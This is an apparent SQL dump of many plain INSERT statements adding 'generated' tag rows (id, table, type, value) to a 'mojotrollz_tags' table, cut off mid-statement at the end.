INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (847, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (848, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (849, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (849, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (850, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (850, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (851, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (851, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (852, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (853, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (853, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (854, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (854, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (855, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (855, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (856, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (856, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (857, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (857, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (858, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (859, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (861, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (861, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (862, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (862, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (863, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (863, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (864, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (865, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (865, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (866, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (867, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (868, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (868, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (869, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (869, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (870, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (870, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (871, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (871, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (873, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (873, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (874, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (874, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (875, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (875, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (876, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (877, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (877, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (878, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (879, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (879, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (880, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (881, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (883, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (885, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (886, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (887, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (888, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (889, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (889, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (890, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (890, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (891, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (891, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (892, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (893, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (894, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (895, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (895, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (896, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (898, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (900, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (903, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (903, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (905, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (905, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (906, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (906, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (907, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (907, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (908, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (909, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (910, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (910, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (911, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (912, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (913, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (914, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (915, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (916, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (917, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (918, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (920, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (920, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (921, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (922, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (923, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (925, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (925, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (926, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (927, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (928, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (930, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (930, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (931, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (931, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (932, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (932, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (933, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (933, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (934, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (935, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (935, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (936, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (936, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (937, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (938, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (938, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (939, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (940, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (940, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (941, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (942, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (942, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (943, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (944, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (945, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (946, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (947, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (947, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (948, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (949, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (949, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (950, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (951, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (952, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (954, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (955, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (955, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (956, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (956, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (957, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (957, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (958, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (959, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (960, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (963, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (976, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (976, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (977, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (978, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (978, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (979, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (980, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (981, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (983, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (985, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (986, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (987, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (988, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (989, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (999, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (999, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1000, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1007, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1008, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1008, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1009, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1009, 